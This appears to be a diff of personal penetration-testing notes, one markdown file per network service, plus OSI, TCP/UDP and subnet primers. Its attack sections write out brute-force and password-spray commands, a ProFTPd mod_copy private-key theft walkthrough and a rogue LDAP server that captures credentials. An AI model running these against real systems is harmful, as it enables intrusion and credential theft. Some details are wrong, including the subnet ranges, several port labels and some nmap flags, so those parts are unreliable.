nmap -sV -SC IP -p20,21
```
- Possible to find FTP on an other port
## Attack
- Brute Force
```Terminal
hydra -t X -l USERNAME -P WORDLIST -vV IP ftp
```
Let's break it down:
- hydra      --->  Runs the hydra tool
- -t X         --->  Number of parallel connections per target
- -l ---> Points to the user who's account you're trying to compromise
- -P ---> Points to the file containing the list of possible passwords
- -vV          ---> Sets verbose mode to very verbose, shows login + password
- IP        ---> The IP address of the target machine
- ftp --->  Sets the protocol
## Connection
- Connection
```
ftp [options] [IP]
```

View file

@ -0,0 +1,35 @@
## ProFTPd
![](https://i.imgur.com/L54MBzX.png)
ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.
Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.
We can use searchsploit to find exploits for a particular software version.
You should have found an exploit from ProFtpd's [mod_copy module](http://www.proftpd.org/docs/contrib/mod_copy.html). 
The mod_copy module implements **SITE CPFR** and **SITE CPTO** commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
We know that the FTP service is running as the X user (from the file on the share) and an ssh key is generated for that user. 
We're now going to copy X user private key using SITE CPFR and SITE CPTO commands.
![](https://i.imgur.com/LajBhh2.png)
We knew that the /var directory was a mount we could see. So we've now moved Kenobi's private key to the /var/tmp directory.
Lets mount the /var/tmp directory to our machine
```Terminal
mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
```
![](https://i.imgur.com/v8Ln4fu.png)
We now have a network mount on our deployed machine! We can go to /var/tmp and get the private key then login to Kenobi's account.
![](https://i.imgur.com/Vy4KkEl.png)

View file

@ -0,0 +1,55 @@
## What is SSH
SSH (Secure Shell) is a network protocol that is used to securely connect to remote systems over an unsecured network, such as the internet. SSH provides a secure encrypted connection between a client and a server, allowing users to remotely access and control systems and services.
SSH works by creating a secure channel between the client and the server using encryption algorithms to secure the connection. This secure channel can be used to run various network services and applications, such as a command shell, file transfer protocol, or remote desktop application.
## Find SSH Port
Nmap
```
nmap -sV -SC IP -p20,21
```
- Possible to find SSH on an other port
## Attack
- Brute Force
```Terminal
hydra -t X -l USERNAME -P WORDLIST -vV IP ssh
```
Let's break it down:
- hydra      --->  Runs the hydra tool
- -t X         --->  Number of parallel connections per target
- -l ---> Points to the user who's account you're trying to compromise
- -P ---> Points to the file containing the list of possible passwords
- -vV          ---> Sets verbose mode to very verbose, shows login + password
- IP        ---> The IP address of the target machine
- ssh --->  Sets the protocol
## Connection
### Linux Connection
- Command
```Terminal
ssh USER@IP
ssh -i id_rsa USER@IP
```
- id_rsa ---> Private
- id_rsa.pub ---> Public (Contain Username)
### Windows Connection
- Option
```Terminal
Remmina (tool)
```
### Active Directory Connection
- Options
```Terminal
- Remmina (tool)
or
- ssh AD-DOMAIN\\<AD Username>@URL/IP/AD-ADDRESS ---> From Linux terminal
```

View file

@ -0,0 +1,35 @@
## What is Telnet
- **What is Telnet?**
Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server.
The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.
- **Replacement**
Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.
 
- **How does Telnet work?**
The user connects to the server by using the Telnet protocol, which means entering **"telnet"** into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the following syntax: **"telnet [ip] [port]"**
## Find Telnet Port
Nmap
```
nmap -sV -SC IP -p23
```
- Possible to find Telnet on an other port
## Connection
Telnet
```Terminal
telnet [ip] [port]
```
- IP ---> Target IP
- PORT ---> Port we want to interact with (example -> 110)
Exploit CVE
- [https://www.cvedetails.com/](https://www.cvedetails.com/)
- [https://cve.mitre.org/](https://cve.mitre.org/)[](https://cve.mitre.org/)

View file

@ -0,0 +1,84 @@
## What is SMTP
SMTP stands for "Simple Mail Transfer Protocol". It is utilised to handle the sending of emails. In order to support email services, a protocol pair is required, comprising of SMTP and POP/IMAP. Together they allow the user to send outgoing mail and retrieve incoming mail, respectively.
The SMTP server performs three basic functions:
-  It verifies who is sending emails through the SMTP server.
-  It sends the outgoing mail
-  If the outgoing mail can't be delivered it sends the message back to the sender
Most people will have encountered SMTP when configuring a new email address on some third-party email clients, such as Thunderbird; as when you configure a new email client, you will need to configure the SMTP server configuration in order to send outgoing emails.
- **POP and IMAP**
POP, or "Post Office Protocol" and IMAP, "Internet Message Access Protocol" are both email protocols who are responsible for the transfer of email between a client and a mail server. The main differences is in POP's more simplistic approach of downloading the inbox from the mail server, to the client. Where IMAP will synchronise the current inbox, with new mail on the server, downloading anything new. This means that changes to the inbox made on one computer, over IMAP, will persist if you then synchronise the inbox from another computer. The POP/IMAP server is responsible for fulfiling this process.
- **How does SMTP work?**
Email delivery functions much the same as the physical mail delivery system. The user will supply the email (a letter) and a service (the postal delivery service), and through a series of steps- will deliver it to the recipients inbox (postbox). The role of the SMTP server in this service, is to act as the sorting office, the email (letter) is picked up and sent to this server, which then directs it to the recipient.
We can map the journey of an email from your computer to the recipients like this:
![](https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/untitled.png?raw=true)
1. The mail user agent, which is either your email client or an external program. connects to the SMTP server of your domain, e.g. smtp.google.com. This initiates the SMTP handshake. This connection works over the SMTP port- which is usually 25. Once these connections have been made and validated, the SMTP session starts.
2. The process of sending mail can now begin. The client first submits the sender, and recipient's email address- the body of the email and any attachments, to the server.
3. The SMTP server then checks whether the domain name of the recipient and the sender is the same.
4. The SMTP server of the sender will make a connection to the recipient's SMTP server before relaying the email. If the recipient's server can't be accessed, or is not available- the Email gets put into an SMTP queue.
5. Then, the recipient's SMTP server will verify the incoming email. It does this by checking if the domain and user name have been recognised. The server will then forward the email to the POP or IMAP server, as shown in the diagram above.
6. The E-Mail will then show up in the recipient's inbox.
This is a very simplified version of the process, and there are a lot of sub-protocols, communications and details that haven't been included. If you're looking to learn more about this topic, this is a really friendly to read breakdown of the finer technical details- I actually used it to write this breakdown:
[https://computer.howstuffworks.com/e-mail-messaging/email3.htm](https://computer.howstuffworks.com/e-mail-messaging/email3.htm)
- **What runs SMTP?**
SMTP Server software is readily available on Windows server platforms, with many other variants of SMTP being available to run on Linux.
- **More Information:**
Here is a resource that explain the technical implementation, and working of, SMTP in more detail than I have covered here.
[https://www.afternerd.com/blog/smtp/](https://www.afternerd.com/blog/smtp/)
## Find SMTP Port
Nmap
```
nmap -sV -SC IP -p25,587
```
- Possible to find SMTP on an other port
## Attack
Two Possible ways to exploit SMPT
- A user account name ---> Enumeration & Metasploit
- The type of SMTP server and Operating System running. ---> Nmap and Metasploit
- Metasploit (BEST)
```
- msfconsole module ---> smtp_version
- msfconsole module ---> smtp_enum
```
- Enumeration
```Terminal
smtp-user-enum --help
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt mail.example.tld 25
```
- smtp-user-enum       --->  Runs the tool
- -U          --->  Users List
- mail.example.tld ---> SMTP Mail to attack
- 25 ---> Port
## Connection
Telnet
```
telnet [ip] 25
```

View file

@ -0,0 +1,25 @@
## What is RDP
RDP stands for Remote Desktop Protocol, which is a proprietary protocol developed by Microsoft that allows users to access and control a computer remotely over a network connection. With RDP, users can connect to a remote computer and interact with it as if they were sitting in front of it, using their own keyboard, mouse, and monitor.
## Find RDP ports
- Nmap
```Terminal
nmap -sV -sC IP -p3026,3389
```
- Possible to find RDP on an other port
## Attack
- Brute Force (https://github.com/xFreed0m/RDPassSpray)
```Terminal
python3 RDPassSpray.py -h
python3 RDPassSpray.py -U USERNAMES.txt -p Spring2021! -t IP:PORT
python3 RDPassSpray.py -U USERNAMES.txt -p Spring2021! -d DOMAIN -T RDP_servers.txt
```
- -U ---> Username List
- -p ---> Single Password
- -d ---> Windows Domain
- -t ---> Targets (List of IP's)

View file

@ -0,0 +1,80 @@
## What is MySQL
In its simplest definition, MySQL is a relational database management system (RDBMS) based on Structured Query Language (SQL). Too many acronyms? Let's break it down:
- **Database:**
A database is simply a persistent, organised collection of structured data
- **RDBMS:**
A software or service used to create and manage databases based on a relational model. The word "relational" just means that the data stored in the dataset is organised as tables. Every table relates in some way to each other's "primary key" or other "key" factors.
- **SQL:**
MYSQL is just a brand name for one of the most popular RDBMS software implementations. As we know, it uses a client-server model. But how do the client and server communicate? They use a language, specifically the Structured Query Language (SQL).
Many other products, such as PostgreSQL and Microsoft SQL server, have the word SQL in them. This similarly signifies that this is a product utilising the Structured Query Language syntax.
- **How does MySQL work?**
MySQL, as an RDBMS, is made up of the server and utility programs that help in the administration of MySQL databases.
The server handles all database instructions like creating, editing, and accessing data. It takes and manages these requests and communicates using the MySQL protocol. This whole process can be broken down into these stages:
1. MySQL creates a database for storing and manipulating data, defining the relationship of each table.
2. Clients make requests by making specific statements in SQL.
3. The server will respond to the client with whatever information has been requested.
- **What runs MySQL?**
MySQL can run on various platforms, whether it's Linux or windows. It is commonly used as a back end database for many prominent websites and forms an essential component of the LAMP stack, which includes: Linux, Apache, MySQL, and PHP.
- **More Information:**
Here are some resources that explain the technical implementation, and working of, MySQL in more detail than I have covered here:
[https://dev.mysql.com/doc/dev/mysql-server/latest/PAGE_SQL_EXECUTION.html](https://dev.mysql.com/doc/dev/mysql-server/latest/PAGE_SQL_EXECUTION.html) 
[https://www.w3schools.com/php/php_mysql_intro.asp](https://www.w3schools.com/php/php_mysql_intro.asp)
## Find MySQL Port
- Nmap
```Terminal
nmap -sV -sC IP -p3306
```
- Possible to find MySQL on an other port
## Attack
```
- 4 Possible ways to get in MYSQL databse
```Terminal
1. MySQL server credentials ---> Brute Froce
2. The version of MySQL running ---> Via Nmap Scan
3. The number of Databases, and their names. ---> Nmap & MSFconsole
4. Post exploitation ---> Finding Creds in machine (Ex: Server running Wordpress)
```
- Brute Force
```Terminal
hydra -t X l USERNAME P WORDLIST IP -vV mysql
```
- hydra    --->  Runs the hydra tool
- -t X         --->  Number of parallel connections per target
- -l ---> Points to the user who's account you're trying to compromise
- -P ---> Points to the file containing the list of possible passwords
- -vV          ---> Sets verbose mode to very verbose, shows login + password
- IP        ---> The IP address of the target machine
- mysql --->  Sets the protocol
- Metasploit
```
- msfconsole ---> mysql_schemadump
- msfconsole ---> mysql_hashdump
```
## Connection
- Manual connection
```Terminal
mysql -u USER -p PASSWORD -h IP
```

View file

@ -0,0 +1,82 @@
## What is LDAP
LDAP (Lightweight Directory Access Protocol) is a protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network. It is used to access and manage directory information that is organized in a hierarchical manner, similar to a file system. LDAP directories are commonly used to store information such as user names, passwords, and email addresses, as well as other types of information such as security certificates and encryption keys.
LDAP is based on the X.500 standard and can be used to authenticate users and to provide access to resources on a network. When a client application needs to authenticate a user or retrieve information from the directory, it sends a request to the LDAP server using the LDAP protocol. The LDAP server processes the request and returns the requested information to the client if the request is valid.
LDAP servers provide a centralized location for storing and managing directory information, and client applications can use LDAP to query the directory and retrieve the information they need. LDAP is often used in conjunction with other protocols, such as Kerberos, to provide secure authentication and authorization services for a network.
There are two commonly used ports for LDAP traffic: port 389 and port 636. Port 389 is the default port for LDAP and is used for unencrypted LDAP traffic. Port 636 is the default secure port for LDAP and is used for LDAP traffic encrypted with SSL/TLS (Secure Sockets Layer/Transport Layer Security).
LDAP can be exploited over a rogue LDAP server in a number of ways. For example, an attacker could set up a fake LDAP server and configure it to impersonate a legitimate LDAP server. The attacker could then use the fake server to capture and misuse the credentials (PORT 389) of users who try to authenticate with it. An attacker could also use a rogue LDAP server to inject malicious content into the directory, such as false or misleading information, or to manipulate the directory in other ways.
## Find LDAP Port
- Nmap
```Terminal
nmap -sV -sC IP -p389,636
```
- Possible to find LDAP on an other port
## Attack
Type of place to exploit LDAP (Servers)
- Gitlab
- Jenkins
- Custom-developed web applications
- Printers
- VPNs
- Example of what your looking for
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/6093e17fa004d20049b6933e/room-content/b2ab520a2601299ed9bf74d50168ca7d.png)
Simple Netcat Lisener (Might not work)
```
# Find server (Ex:printer) on the network where there is credential saved (View Pics)
# Setup your Local IP in the field and try ti capture it with Netcat
nc -lvp 389
# Send request in the browser (If this dont work, follow the rogue server technique)
```
Rogue Server (create a server that dictate how data should be share) -> Plain text | Login
```
# Download Tools
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
# Create a new file (location does not matter)
touch olcSaslSecProps.ldif
nano olcSaslSecProps.ldif (Add the following)
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
# Restart the service
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
# Check permission
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
# Launch the server
sudo tcpdump -SX -i INTERFACE tcp port 389
# Send request in the browser (See Picture)
```
Output (Example)
```
...
win 8212, length 0
0x0000: 4500 0028 b092 4000 8006 2128 0a0a 0ac9 E..(..@...!(....
0x0010: 0a0a 0a39 c2ab 0185 8b05 d64a b818 7e2d ...9.......J..~-
0x0020: 5010 2014 0ae4 0000 0000 0000 0000 P.............
10:41:52.989165 IP 10.10.10.201.49835 > 10.10.10.57.ldap: Flags [P.], seq 2332415562:2332415627, ack 3088612909, win 8212, length 65
0x0000: 4500 0069 b093 4000 8006 20e6 0a0a 0ac9 E..i..@.........
0x0010: 0a0a 0a39 c2ab 0185 8b05 d64a b818 7e2d ...9.......J..~-
0x0020: 5018 2014 3afe 0000 3084 0000 003b 0201 P...:...0....;..
0x0030: 0560 8400 0000 3202 0102 0418 7a61 2e74 .`....2.....za.t
0x0040: 7279 6861 636b 6d65 2e63 6f6d 5c73 7663 ryhackme.com\svc
0x0050: 4c44 4150 8013 7472 7968 6163 6b6d 656c LDAP..password11
```
- Example in this case the password is ---> password11

View file

@ -0,0 +1,68 @@
## What is DNS
DNS (Domain Name System) uses port 53 as its default port for communication between DNS clients and DNS servers. When a DNS client, such as a web browser or email client, needs to resolve a domain name into an IP address, it sends a DNS query to a DNS server using UDP or TCP on port 53.
DNS servers typically listen for incoming queries on port 53 and respond with the corresponding IP address or other DNS records, such as MX records for email servers or TXT records for domain verification.
Port 53 is designated by the Internet Assigned Numbers Authority (IANA) as the standard port for DNS, and it is widely used on the internet for DNS communication between clients and servers.
## Find DNS Port
Nmap
```
nmap -sV -SC IP -p53
```
- Possible to find DNS on an other port
## Connection
- Telnet
```Terminal
telnet [ip] 53
```
- Using Nslookup or Dig
```Terminal
dig www.example.com A
nslookup www.example.com A
...
```
- A ---> A record (DNS query we want information on)
## Attack
If an attacker is able to access an open port 53 (DNS) on a target system, they may be able to perform a variety of actions, depending on the configuration of the DNS server. Some possible actions an attacker could take include:
1. Perform DNS spoofing attacks: ---> Redirect users to fake websites or intercept sensitive data being transmitted over the network.
2. Conduct DNS amplification attacks ---> (DoS) attack.
3. Enumerate domain names ---> DNS zone transfers (List of all the domain names registered on a particular DNS server)
### Check Zone Info
One way to send a DNS query using `telnet` to converts a DNS query into binary format, such as `dig` or `nslookup`. Here is an example of how you can use `dig` to send a DNS query for an A record for the domain `www.example.com`:
- Searching trought the DNS using DIG
```
dig www.example.com A
dig www.example.com CNAME
```
### DNS Zone Transfer
To exploit a DNS zone transfer, you will need to know the IP address of the DNS server you want to request the records from and the name of the zone you want to transfer.
Here is an example of how you can use `dig` to request a DNS zone transfer from a DNS server:
- DNS zone transfer
```
dig @[DNS server IP] [zone] axfr
dig axfr [domain] @[DNS server]
host -t ns [domain]
host -l [domain] @[DNS server]
```
Replace `[DNS server IP]` with the IP address of the DNS server and `[zone]` with the name of the zone you want to transfer.
Replace `[domain]` with the domain for which you want to perform the zone transfer, and `[DNS server]` with the IP address or hostname of the DNS server that you want to query.
**TAKE NOTES THAT IT IS NOT POSSIBLE TO MODIFY DNS RECORDS BY ACCESSING AN OPEN PORT 53. PORT 53 IS THE STANDARD PORT USED FOR DNS QUERIES AND RESPONSES, AND IS USED TO COMMUNICATE BETWEEN DNS CLIENTS (SUCH AS WEB BROWSERS) AND DNS SERVERS**

View file

@ -0,0 +1,24 @@
## What is VNC
VNC (Virtual Network Computing) is a graphical desktop sharing system that allows a user to remotely control the desktop of another computer or server. VNC typically uses ports 5900-5906 as its default ports for communication between the VNC client and VNC server.
The exact port number used by VNC depends on the display number of the remote desktop that is being shared. For example, if the remote desktop is being shared on display number 1, then the VNC server will listen on port 5901 (5900 + display number).
In addition to the default VNC ports, some VNC implementations may use other ports for specific purposes. For example, some implementations may use port 5800 or 5801 for web-based VNC sessions, which allow users to access a VNC session through a web browser.
It's important to note that VNC is not typically used over the public internet due to security concerns, as it is a plaintext protocol that can be intercepted and potentially exploited by attackers. Instead, it is often used in local network environments where the connection between the client and server can be secured through other means, such as VPN or SSH tunnels.
## Attack
- Brute Forcing
```
hydra -s 5900/5901 -P PASSWORD.txt -t 4 IP vnc
```
## Connection
- Connection
```
#VNCviewer
vncviewer IP
#Remmina
GUI
```

View file

@ -0,0 +1,19 @@
## What is Kerberos
Kerberos is a network authentication protocol that is used to securely authenticate users and services on a network. Kerberos uses port 88 as its default port for communication between the Kerberos client and the Kerberos server.
When a user tries to log in to a Kerberos-secured system, the Kerberos client sends a ticket request to the Kerberos server on port 88. The Kerberos server then responds with a ticket granting ticket (TGT), which the Kerberos client can use to request service tickets from the Kerberos server for accessing various network services.
Port 88 is designated by the Internet Assigned Numbers Authority (IANA) as the standard port for Kerberos, and it is used for communication between Kerberos clients and servers on the network. However, it's important to note that Kerberos can also use other ports, such as 464 for password changing and 749 for administration purposes, depending on the configuration of the Kerberos implementation.
## Find Kerberos Port
Nmap
```
nmap -sV -SC IP -p88
```
- Possible to find Kerberos on an other port
## Attack Vectors
Kerberos often mean that this is the Domain Controler
More information ---> [Here]([[Red Team/6 - Machine/3 - Active Directory/Notes/Specific Topics/• Kerberos]])

View file

@ -0,0 +1,19 @@
## What is OWA
Microsoft Exchange Server mailbox provides a web-based interface that allows users to access their email, calendar, tasks, and other Exchange Server features from anywhere with an internet connection.
OWA is often used in situations where users cannot access their email client on their desktop, such as when they are traveling or working remotely. It is also used in environments where email access is restricted, such as in corporate settings where access to email servers is restricted from outside the corporate network.
OWA provides a similar experience to using the Outlook desktop application, including features such as drag-and-drop functionality, rich formatting options, and the ability to view and edit attachments. It is commonly used in organizations of all sizes, from small businesses to large enterprises.
## Find RDP ports
- Nmap
```Terminal
nmap -sV -sC IP -p443
```
- Possible to find OWA on an other port
## Attack
- Brute Force
- https://github.com/byt3bl33d3r/SprayingToolkit
- https://github.com/dafthack/MailSniper

View file

@ -0,0 +1,45 @@
## Type of Ports
Well known ports ranges ---> 0 - 1023
Register port ranges ---> 1024 - 49151
Dynamic port ranges (Temporary port) ---> 49152 - 65535
## Port Table
| Port Number | Service | Description | Exploit | Link |
| ----------- | ------------- | ----------------------------------------------- | --------------------------------- | --------- |
| 20 | FTP | | | [[• FTP]] |
| 21 | SFTP | | | [[• FTP]] |
| 22 | SSH | SSH Encrypted Shell | Brute Force | [[• SSH]] |
| 23 | Telnet | | | [[• Telnet]] |
| 25 | SMTP | Simple Mail Transfer Protocol | | [[• SMTP]] |
| 53 | DNS | Domain Name System | | [[• DNS]] |
| 67 | DHCP (Server) | Dynamic Host Configuration Protocol | | |
| 68 | DHCP (Client) | Dynamic Host Configuration Protocol | | |
| 69 | TFTP | Trivial File Transfer Protocol | | |
| 80 | HTTP | Hypertext Transfer Protocol (Server) | | |
| 88 | Kerberos | | | |
| 110 | POP3 | Post Office Protocol V.3 | | [[• POP3]] |
| 111 | NSF | Network File System | Mounting Vulnerable Shared Folder | [[• NSF]] |
| 135 | MSRPC | | | [[• MSRPC]] |
| 137 | NetBIOS | Network Basic Input/Output System (Legacy) | | |
| 139 | NetBIOS | Network Basic Input/Output System (Legacy) | | |
| 143 | IMAP | | | [[• IMAP]] |
| 161 | SNMP | Simple Network Management Protocol | | |
| 162 | SNMP | Simple Network Management Protocol | | |
| 389 | LDAP | Lightweigth Directory Application Protocol (AD) | | [[• LDAP]] |
| 443 | HTTPS | Hypertext Transfer Protocol Secure (Server) | | |
| 445 | SMB | Server Message Block | | [[• SMB]] |
| 587 | SMPT | | | [[• SMTP]] |
| 636 | SSL LDAP | SSL LDAP authentification in Active Directory | | [[• LDAP]] |
| 993 | IMAPS | | | |
| 995 | POP3S | | | |
| 1433 | MYSQL | MYSQL database | | [[• MySQL]] |
| 1434 | MYSQL | MYSQL database | | [[• MySQL]] |
| 1723 | PPTP | | | |
| 3026 | RDP | Remote Desktop Protocol | Brute Force | [[• RDP]] |
| 3306 | SQL Database | Microsoft or MYSQL database | | [[• MySQL]] |
| 3389 | RDP | Remote Desktop Protoco | Brute Force | [[• RDP]] |
| 5060 | VoIP | Session Initial Protocol | | |
| 5900 | VNC | Virtual Network Computing | Brute Force | [[• VNC]] |
| 8080 | HTTPS | Hypertext Transfer Protocol Secure (Server) | | |
| | | | | |

View file

@ -0,0 +1,105 @@
## The OSI model consists of seven layers:
![Table showing the OSI layers: Application, Presentation, Session, Transport, Network, Data Link, Physical](https://muirlandoracle.co.uk/wp-content/uploads/2020/02/OSI-Table.png)
There are many mnemonics floating around to help you learn the layers of the OSI model -- search around until you find one that you like.
**P**lease **D**o **N**ot **T**ouch **S**teve's **P**et **A**lligator
- Layer 7 -- Application: (HTTP (GUI))
The application layer of the OSI model essentially provides networking options to programs running on a computer. It works almost exclusively with applications, providing an interface for them to use in order to transmit data. When data is given to the application layer, it is passed down into the presentation layer.
- Layer 6 -- Presentation: (Translate, Transform & encrypt data)
The presentation layer receives data from the application layer. This data tends to be in a format that the application understands, but it's not necessarily in a standardised format that could be understood by the application layer in the _receiving_ computer. The presentation layer translates the data into a standardised format, as well as handling any encryption, compression or other transformations to the data. With this complete, the data is passed down to the session layer.
- Layer 5 -- Session: (Create Sessions, Synchronise, Send parkets (Parts of the data))
When the session layer receives the correctly formatted data from the presentation layer, it looks to see if it can set up a connection with the other computer across the network. If it can't then it sends back an error and the process goes no further. If a session _can_ be established then it's the job of the session layer to maintain it, as well as co-operate with the session layer of the remote computer in order to synchronise communications. The session layer is particularly important as the session that it creates is unique to the communication in question. This is what allows you to make multiple requests to different endpoints simultaneously without all the data getting mixed up (think about opening two tabs in a web browser at the same time)! When the session layer has successfully logged a connection between the host and remote computer the data is passed down to Layer 4: the transport Layer.
- Layer 4 -- Transport: (TCP, UDP - Receive data (TCP Slow - Accurate + Synchronise) (UDP Fast - No check Up))
The transport layer is a very interesting layer that serves numerous important functions. Its first purpose is to choose the protocol over which the data is to be transmitted. The two most common protocols in the transport layer are TCP (**T**ransmission **C**ontrol **P**rotocol) and UDP (**U**ser **D**atagram **P**rotocol); with TCP the transmission is _connection-based_ which means that a connection between the computers is established and maintained for the duration of the request. This allows for a reliable transmission, as the connection can be used to ensure that the packets _all_ get to the right place. A TCP connection allows the two computers to remain in constant communication to ensure that the data is sent at an acceptable speed, and that any lost data is re-sent. With UDP, the opposite is true; packets of data are essentially thrown at the receiving computer -- if it can't keep up then that's _its_ problem (this is why a video transmission over something like Skype can be pixelated if the connection is bad). What this means is that TCP would usually be chosen for situations where accuracy is favoured over speed (e.g. file transfer, or loading a webpage), and UDP would be used in situations where speed is more important (e.g. video streaming).
With a protocol selected, the transport layer then divides the transmission up into bite-sized pieces (over TCP these are called _segments_, over UDP they're called _datagrams_), which makes it easier to transmit the message successfully. 
- Layer 3 -- Network: (Route data to computer via IP (optimal path) & reassemble data)
The network layer is responsible for locating the destination of your request. For example, the Internet is a huge network; when you want to request information from a webpage, it's the network layer that takes the IP address for the page and figures out the best route to take. At this stage we're working with what is referred to as _Logical_ addressing (i.e. IP addresses) which are still software controlled. Logical addresses are used to provide order to networks, categorising them and allowing us to properly sort them. Currently the most common form of logical addressing is the IPV4 format, which you'll likely already be familiar with (i.e 192.168.1.1 is a common address for a home router).
- Layer 2 -- Data Link: (Receives packet from the network layer (including the IP) and adds in the physical **MAC** address
The data link layer focuses on the _physical_ addressing of the transmission. It receives a packet from the network layer (that includes the IP address for the remote computer) and adds in the physical (MAC) address of the receiving endpoint. Inside every network enabled computer is a Network Interface Card (NIC) which comes with a unique MAC (Media Access Control) address to identify it.
MAC addresses are set by the manufacturer and literally burnt into the card; they can't be changed -- although they _can_ be spoofed. When information is sent across a network, it's actually the physical address that is used to identify where exactly to send the information.
Additionally, it's also the job of the data link layer to present the data in a format suitable for transmission.
The data link layer also serves an important function when it receives data, as it checks the received information to make sure that it hasn't been corrupted during transmission, which could well happen when the data is transmitted by layer 1: the physical layer.
- Layer 1 -- Physical: (Physical components of the hardware used in networking, Include 0's and 1's)
The physical layer is right down to the hardware of the computer. This is where the electrical pulses that make up data transfer over a network are sent and received. It's the job of the physical layer to convert the binary data of the transmission into signals and transmit them across the network, as well as receiving incoming signals and converting them back into binary data.
## TCP/IP
The TCP/IP model is, in many ways, very similar to the OSI model. It's a few years older, and serves as the basis for real-world networking. The TCP/IP model consists of four layers: Application, Transport, Internet and Network Interface. Between them, these cover the same range of functions as the seven layers of the OSI Model.
![The layesrs of the TCP/IP model: Application, Transport,Internet, Network Interface](https://muirlandoracle.co.uk/wp-content/uploads/2020/02/image-4.png)
_**Note:** Some recent sources split the TCP/IP model into five layers -- breaking the Network Interface layer into Data Link and Physical layers (as with the OSI model). This is accepted and well-known; however, it is not officially defined (unlike the original four layers which are defined in RFC1122). It's up to you which version you use -- both are generally considered valid._
You would be justified in asking why we bother with the OSI model if it's not actually used for anything in the real-world. The answer to that question is quite simply that the OSI model (due to being less condensed and more rigid than the TCP/IP model) tends to be easier for learning the initial theory of networking.
The two models match up something like this:
![Comparison between the TCP/IP and OSI models.](https://muirlandoracle.co.uk/wp-content/uploads/2020/02/image-3.png)
The processes of encapsulation and de-encapsulation work in exactly the same way with the TCP/IP model as they do with the OSI model. At each layer of the TCP/IP model a header is added during encapsulation, and removed during de-encapsulation.
![[Pasted image 20221111195138.png]]
![[Pasted image 20221111195335.png]]
## Handshake
The TCP (Transmission Control Protocol) handshake is a process that occurs between two devices in a network when they want to establish a connection. It involves exchanging a series of messages between the devices to establish a reliable connection for the exchange of data.
The TCP handshake consists of three steps:
1. **SYN**: The initiating device sends a SYN (synchronize) message to the receiving device, indicating its intention to establish a connection.
2. **SYN-ACK**: The receiving device responds with a SYN-ACK (synchronize-acknowledge) message, acknowledging the receipt of the SYN message and indicating its own intention to establish a connection.
3. **ACK**: The initiating device sends an ACK (acknowledge) message in response to the SYN-ACK, completing the handshake and establishing the connection.
The purpose of the TCP handshake is to ensure that both devices are ready to communicate with each other and that the connection between them is reliable. It also helps to prevent data loss by ensuring that both devices are in sync with each other before transmitting data.
![[Pasted image 20221227193634.png]]
## UDP/IP
The **U**ser **D**atagram **P**rotocol (**UDP**) is another protocol that is used to communicate data between devices.
Unlike its brother TCP, UDP is a **stateless** protocol that doesn't require a constant connection between the two devices for data to be sent. For example, the Three-way handshake does not occur, nor is there any synchronisation between the two devices.
Recall some of the comparisons made about these two protocols in Room 3: "OSI Model". Namely, UDP is used in situations where applications can tolerate data being lost (such as video streaming or voice chat) or in scenarios where an unstable connection is not the end-all. A table comparing the advantages and disadvantages of UDP is located below:
As mentioned, no process takes place in setting up a connection between two devices. Meaning that there is no regard for whether or not data is received, and there are no safeguards such as those offered by TCP, such as data integrity.
UDP packets are much simpler than TCP packets and have fewer headers. However, both protocols share some standard headers, which are what is annotated in the table below:
![[Pasted image 20221111195513.png]]
## UDP Handshake
the UDP (User Datagram Protocol) does not use a handshake process to establish a connection. UDP is a connectionless protocol, which means that it does not establish a connection before sending data and does not expect an acknowledgement of receipt from the receiving device.
Instead, UDP relies on the IP (Internet Protocol) layer to handle the delivery of data packets between devices. When a device sends a UDP packet, it includes the destination IP address and port number, and the packet is sent to the destination device. There is no guarantee that the packet will be received, and there is no mechanism for retransmitting lost packets.
UDP is often used for real-time applications that require low latency and do not need to guarantee the delivery of data. Examples include online gaming, voice over IP (VoIP), and streaming audio and video.

View file

@ -0,0 +1,14 @@
## Subnet Mask
A subnet mask is used in IP addresses to specify the range of addresses that are part of a network. The subnet mask is denoted by a slash followed by a number, such as /24 or /23, which specifies the number of bits that are used to identify the network portion of the address. The network portion of an IP address is the part that identifies the network, while the remaining part identifies the host.
The most commonly used subnet masks are:
- <font color="blue">/24</font>: This subnet mask includes all IP addresses from x.x.x.1 to x.x.x.254, where x.x.x is the network portion of the address. This is often used for small to medium-sized networks.
- <font color="blue">/23</font>: This subnet mask includes all IP addresses from x.x.x.1 to x.x.x.254, where x.x.x is the network portion of the address. This is often used for larger networks.
- <font color="blue">/16</font>: This subnet mask includes all IP addresses from x.x.0.1 to x.x.255.254, where x.x is the network portion of the address. This is often used for very large networks.
Other subnet masks that may be used to split a network into smaller subnetworks include:
- <font color="blue">/25</font>: This subnet mask includes all IP addresses from x.x.x.1 to x.x.x.126, where x.x.x is the network portion of the address.
- <font color="blue">/26</font>: This subnet mask includes all IP addresses from x.x.x.1 to x.x.x.62, where x.x.x is the network portion of the address.
- <font color="blue">/27</font>: This subnet mask includes all IP addresses from x.x.x.1 to x.x.x.30, where x.x.x is the network portion of the address.
- <font color="blue">/28</font>: This subnet mask includes all IP addresses from x.x.x.1 to x.x.x.14, where x.x.x is the network portion of the address.

View file

@ -0,0 +1,18 @@
Directory enumeration is the process of obtaining a list of files and directories from a file system. This can be done using various command-line tools such as 'ls' on Linux and macOS, and 'dir' on Windows.
